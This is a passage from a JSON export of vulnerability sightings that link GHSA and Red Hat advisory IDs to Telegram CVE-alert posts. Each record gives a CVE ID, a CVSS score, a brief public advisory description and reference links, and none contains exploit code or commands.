CVE-2025-32372\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. A bypass has been identified for the previously known vulnerability CVE-2017-0929, allowing unauthenticated attackers to execute arbitrary GET requests against target systems, including internal or adjacent networks. This vulnerability facilitates a semi-blind SSRF attack, allowing attackers to make the target server send requests to internal or external URLs without viewing the full responses. Potential impacts include internal network reconnaissance, bypassing firewalls. This vulnerability is fixed in 9.13.8.\n\ud83d\udccf Published: 2025-04-09T15:14:35.442Z\n\ud83d\udccf Modified: 2025-04-09T15:42:10.913Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-3f7v-qx94-666m\n2. https://github.com/dnnsoftware/Dnn.Platform/commit/4721dd9eef846936d3b1a3676499e46968d15feb", "creation_timestamp": "2025-04-09T15:47:38.000000Z"}, {"uuid": "1775440e-109a-493a-9a38-5562236c1fe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9136", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "3bf7ad46-33f7-4394-984f-1d2fb05829f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WJW-6XMF-44XF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10743", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-38797\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: EDK2 contains a vulnerability in the HashPeImageByType(). A user may cause a read out of bounds when a corrupted data pointer and length are sent via an adjecent network. A successful exploit of this vulnerability may lead to a loss of Integrity and/or Availability.\n\ud83d\udccf Published: 2025-04-07T17:18:01.014Z\n\ud83d\udccf Modified: 2025-04-07T17:18:01.014Z\n\ud83d\udd17 References:\n1. https://github.com/tianocore/edk2/security/advisories/GHSA-4wjw-6xmf-44xf", "creation_timestamp": "2025-04-07T17:45:30.000000Z"}, {"uuid": "e7390676-e70e-4d9c-801a-d3f49d7c0756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-622H-H2P8-743X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10742", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22644\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: A user can reverse engineer the JWT token (JSON Web Token) used in authentication for Manager and API access, forging a valid NeuVector Token to perform malicious activity in NeuVector. This can lead to an RCE.\n\ud83d\udccf Published: 2023-09-20T08:12:34.130Z\n\ud83d\udccf Modified: 2025-04-07T17:19:01.804Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2023-32188\n2. https://github.com/neuvector/neuvector/security/advisories/GHSA-622h-h2p8-743x", "creation_timestamp": "2025-04-07T17:45:29.000000Z"}, {"uuid": "632871ed-a4fd-4820-8f98-e8efa3bd6887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MPV-9XG6-5R79", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10784", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31496\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: apollo-compiler is a query-based compiler for the GraphQL query language. Prior to 1.27.0, a vulnerability in Apollo Compiler allowed queries with deeply nested and reused named fragments to be prohibitively expensive to validate. Named fragments were being processed once per fragment spread in some cases during query validation, leading to exponential resource usage when deeply nested and reused fragments were involved. This could lead to excessive resource consumption and denial of service in applications. This vulnerability is fixed in 1.27.0.\n\ud83d\udccf Published: 2025-04-07T20:34:46.624Z\n\ud83d\udccf Modified: 2025-04-07T20:34:46.624Z\n\ud83d\udd17 References:\n1. https://github.com/apollographql/apollo-rs/security/advisories/GHSA-7mpv-9xg6-5r79\n2. https://github.com/apollographql/apollo-rs/pull/952", "creation_timestamp": "2025-04-07T20:46:13.000000Z"}, {"uuid": "ca01d194-702c-4d12-b5a9-f5fab93e65f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3J3-FHQG-66RH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11049", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-4428\n\ud83d\udd25 CVSS Score: 8.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: support_uri parameter in the WARP client local settings file (mdm.xml) lacked proper validation which allowed for privilege escalation and launching an arbitrary executable on the local machine upon clicking on the \"Send feedback\" option. An attacker with access to the local file system could use a crafted XML config file pointing to a malicious file or set a local path to the executable using Cloudflare Zero Trust Dashboard (for Zero Trust enrolled clients).\n\n\ud83d\udccf Published: 2023-01-11T16:49:36.512Z\n\ud83d\udccf Modified: 2025-04-09T13:43:13.391Z\n\ud83d\udd17 References:\n1. https://github.com/cloudflare/advisories/security/advisories/GHSA-h3j3-fhqg-66rh", "creation_timestamp": "2025-04-09T13:47:21.000000Z"}, {"uuid": "324cf0a5-45d7-4ba7-8827-7464d28a3f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P4QW-7J9G-5H53", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10786", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32029\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: ts-asn1-der is a collection of utility classes to encode ASN.1 data following DER rule. Incorrect number DER encoding can lead to denial on service for absolute values in the range 2**31 -- 2**32 - 1. The arithmetic in the numBitLen didn't take into account that values in this range could result in a negative result upon applying the &gt;&gt; operator, leading to an infinite loop. The issue is patched in version 1.0.4. If upgrading is not an option, the issue can be mitigated by validating inputs to Asn1Integer to ensure that they are not smaller than -2**31 + 1 and no larger than 2**31 - 1.\n\ud83d\udccf Published: 2025-04-07T20:13:48.176Z\n\ud83d\udccf Modified: 2025-04-07T20:13:48.176Z\n\ud83d\udd17 References:\n1. https://github.com/ApelegHQ/ts-asn1-der/security/advisories/GHSA-p4qw-7j9g-5h53\n2. https://github.com/ApelegHQ/ts-asn1-der/commit/b2bc9032cbe19755d234a27d79e47a7e52993af8", "creation_timestamp": "2025-04-07T20:46:15.000000Z"}, {"uuid": "e633b474-76a9-4ce6-b380-c6f28c0b19ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8R8-43HH-RGHM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10787", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29769\n\ud83d\udd25 CVSS Score: 8.5 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: libvips is a demand-driven, horizontally threaded image processing library.  The heifsave operation could incorrectly determine the presence of an alpha channel in an input when it was not possible to determine the colour interpretation, known internally within libvips as \"multiband\". There aren't many ways to create a \"multiband\" input, but it is possible with a well-crafted TIFF image. If a \"multiband\" TIFF input image had 4 channels and HEIF-based output was requested, this led to libvips creating a 3 channel HEIF image without an alpha channel but then attempting to write 4 channels of data. This caused a heap buffer overflow, which could crash the process. This vulnerability is fixed in 8.16.1.\n\ud83d\udccf Published: 2025-04-07T20:09:30.971Z\n\ud83d\udccf Modified: 2025-04-07T20:09:30.971Z\n\ud83d\udd17 References:\n1. https://github.com/libvips/libvips/security/advisories/GHSA-f8r8-43hh-rghm\n2. https://github.com/libvips/libvips/pull/4392\n3. https://github.com/libvips/libvips/pull/4394\n4. https://github.com/libvips/libvips/commit/9ab6784f693de50b00fa535b9efbbe9d2cbf71f2\n5. https://issues.oss-fuzz.com/issues/396460413", "creation_timestamp": "2025-04-07T20:46:19.000000Z"}, {"uuid": "6add6e8f-d7a7-4971-99f6-a1ff92af68c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QQHF-PM3J-96G7", "type": "published-proof-of-concept", "source": "Telegram/O75PhiQXIQQqxIYhPn3iCtfE3Ob54qnqXb_OW50vy_kdeBs", "content": "", "creation_timestamp": "2026-01-12T18:08:06.000000Z"}, {"uuid": "28939d51-1fa5-4dfc-8239-bb67b40e681a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MQ9-HM29-8QCH", "type": "seen", "source": "Telegram/7OV4Kg0NF6xyxwTZgrduftSK3b0IfQ2wYXzBDbhoudUKRmw", "content": "", "creation_timestamp": "2026-01-12T19:06:48.000000Z"}, {"uuid": "7ae33baa-1574-4140-b83e-a560aa421db6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-742X-X762-7383", "type": "published-proof-of-concept", "source": "Telegram/4lfrJzyKgz7Xfkmo9hP10nh0kqZGrFrgmtcVT2t75Nf85eU", "content": "", "creation_timestamp": "2026-01-12T19:06:39.000000Z"}, {"uuid": "43430b35-17ce-426f-a994-87d8635920f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3670", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10806", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2487\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the 389-ds-base LDAP Server. This issue occurs when issuing a Modify DN LDAP operation through the ldap protocol, when the function return value is not tested and a NULL pointer is dereferenced. If a privileged user performs a ldap MODDN operation after a failed operation, it could lead to a Denial of Service (DoS) or system crash.\n\ud83d\udccf Published: 2025-03-18T16:25:43.712Z\n\ud83d\udccf Modified: 2025-04-08T00:16:54.819Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:3670\n2. https://access.redhat.com/security/cve/CVE-2025-2487\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2353071", "creation_timestamp": "2025-04-08T00:46:12.000000Z"}, {"uuid": "24995ee4-11a5-47a6-a769-7f5755bbec23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2703", "type": "seen", "source": "Telegram/TWIFfksyEBRaPIfegQx7mJB8xPsFErQuFl3F3s90qTu9ejY", "content": "", "creation_timestamp": "2026-01-08T05:04:49.000000Z"}, {"uuid": "101ba010-dfb7-4b77-b6e9-366c6b7c7d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VXCM-4RWH-CHPC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11092", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32373\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In limited configurations, registered users may be able to craft a request to enumerate/access some portal files they should not have access to. This vulnerability is fixed in 9.13.8.\n\ud83d\udccf Published: 2025-04-09T15:14:43.704Z\n\ud83d\udccf Modified: 2025-04-09T15:42:50.064Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-vxcm-4rwh-chpc", "creation_timestamp": "2025-04-09T15:47:36.000000Z"}, {"uuid": "04b8d773-4989-4f91-9fca-84e6bbd564e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4H9W-7VFP-PX8M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11104", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32378\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Shopware is an open source e-commerce software platform. Prior to 6.6.10.3 or 6.5.8.17, the default settings for double-opt-in allow for mass unsolicited newsletter sign-ups without confirmation. Default settings are Newsletter: Double Opt-in set to active, Newsletter: Double opt-in for registered customers set to disabled, and Log-in &amp; sign-up: Double opt-in on sign-up set to disabled. With these settings, anyone can register an account on the shop using any e-mail-address and then check the check-box in the account page to sign up for the newsletter. The recipient will receive two mails confirming registering and signing up for the newsletter, no confirmation link needed to be clicked for either. In the backend the recipient is set to \u201cinstantly active\u201d. This vulnerability is fixed in 6.6.10.3 or 6.5.8.17.\n\ud83d\udccf Published: 2025-04-09T15:37:44.010Z\n\ud83d\udccf Modified: 2025-04-09T15:37:44.010Z\n\ud83d\udd17 References:\n1. https://github.com/shopware/shopware/security/advisories/GHSA-4h9w-7vfp-px8m", "creation_timestamp": "2025-04-09T15:47:54.000000Z"}, {"uuid": "e0b12db4-21c2-4268-9892-c0bea82eff6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHQP-8VF8-CJ25", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10640", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2258\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In NetX Duo component HTTP server functionality of Eclipse ThreadX NetX Duo before \nversion 6.4.3, an attacker can cause an integer underflow and a \nsubsequent denial of service by writing a very large file, by specially \ncrafted packets with Content-Length smaller than the data request size. A\n possible workaround is to disable HTTP PUT support.\n\n\n\n\nThis issue follows an uncomplete fix in CVE-2025-0728.\n\ud83d\udccf Published: 2025-04-06T18:50:42.764Z\n\ud83d\udccf Modified: 2025-04-06T18:50:42.764Z\n\ud83d\udd17 References:\n1. https://github.com/eclipse-threadx/netxduo/commit/6c8e9d1c95d71bd4b313e1cc37d8f8841543b248\n2. https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-chqp-8vf8-cj25", "creation_timestamp": "2025-04-06T19:44:14.000000Z"}, {"uuid": "6f1208ed-4610-496c-ac13-04701fa59dc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PP68-5PC2-HV7W", "type": "published-proof-of-concept", "source": "Telegram/r1WVj1DWEYgy6-PsI-eM62JB77qRC4LeAFuyHTjHJQG2Eac", "content": "", "creation_timestamp": "2026-01-12T23:03:01.000000Z"}, {"uuid": "d5c04f17-3e8f-474c-892e-0547b9a2cfa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4591", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10650", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5042\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.\n\ud83d\udccf Published: 2024-05-17T13:12:00.551Z\n\ud83d\udccf Modified: 2025-04-07T01:33:36.316Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4591\n2. https://access.redhat.com/security/cve/CVE-2024-5042\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2280921\n4. https://github.com/advisories/GHSA-2rhx-qhxp-5jpw", "creation_timestamp": "2025-04-07T01:44:19.000000Z"}, {"uuid": "39c37708-11bc-4a9e-b430-1c5b99f6cec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2RHX-QHXP-5JPW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10650", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5042\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.\n\ud83d\udccf Published: 2024-05-17T13:12:00.551Z\n\ud83d\udccf Modified: 2025-04-07T01:33:36.316Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4591\n2. https://access.redhat.com/security/cve/CVE-2024-5042\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2280921\n4. https://github.com/advisories/GHSA-2rhx-qhxp-5jpw", "creation_timestamp": "2025-04-07T01:44:19.000000Z"}, {"uuid": "315069df-26c0-4006-984f-b8945f90d58c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QHQJ-8QW6-WP8V", "type": "seen", "source": "Telegram/H1nFRtyRiOhcROcf0_NE40bSu4SNvkoqq4ZeM2FsiV7bGxI", "content": "", "creation_timestamp": "2026-01-12T20:07:33.000000Z"}, {"uuid": "c35f46d0-9b4b-417c-96d7-818aa640a915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H934-98H4-J43Q", "type": "seen", "source": "Telegram/H1nFRtyRiOhcROcf0_NE40bSu4SNvkoqq4ZeM2FsiV7bGxI", "content": "", "creation_timestamp": "2026-01-12T20:07:33.000000Z"}, {"uuid": "5cc29cdb-23d1-45ce-b0b0-11963ec7d40e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7V4R-C989-XH26", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32375\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.8, there was an insecure deserialization in BentoML's runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server. This vulnerability is fixed in 1.4.8.\n\ud83d\udccf Published: 2025-04-09T15:30:03.842Z\n\ud83d\udccf Modified: 2025-04-09T15:40:52.656Z\n\ud83d\udd17 References:\n1. https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26", "creation_timestamp": "2025-04-09T15:47:44.000000Z"}, {"uuid": "0db256e4-9157-4575-ab88-ce2c677acd34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P837-MRW9-5X5J", "type": "published-proof-of-concept", "source": "Telegram/r1WVj1DWEYgy6-PsI-eM62JB77qRC4LeAFuyHTjHJQG2Eac", "content": "", "creation_timestamp": "2026-01-12T23:03:01.000000Z"}, {"uuid": "875c31c2-9515-4334-b0a1-bf1ff9470653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3558-J79F-VVM6", "type": "published-proof-of-concept", "source": "Telegram/r1WVj1DWEYgy6-PsI-eM62JB77qRC4LeAFuyHTjHJQG2Eac", "content": "", "creation_timestamp": "2026-01-12T23:03:01.000000Z"}, {"uuid": "c0ae1f59-4630-47b2-9fe9-04f44fa082ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8690", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "c9e2f3f5-7ffb-4cdf-bcc0-555a11557315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8694", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "9d3a3134-17d9-49ea-a3c3-c1d0a35a1248", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HF5-MC28-XMCV", "type": "published-proof-of-concept", "source": "Telegram/r1WVj1DWEYgy6-PsI-eM62JB77qRC4LeAFuyHTjHJQG2Eac", "content": "", "creation_timestamp": "2026-01-12T23:03:01.000000Z"}, {"uuid": "d689e89c-85dd-4bb2-9aa4-43bf20cda395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2RRC-G594-RHQW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11095", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32371\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: 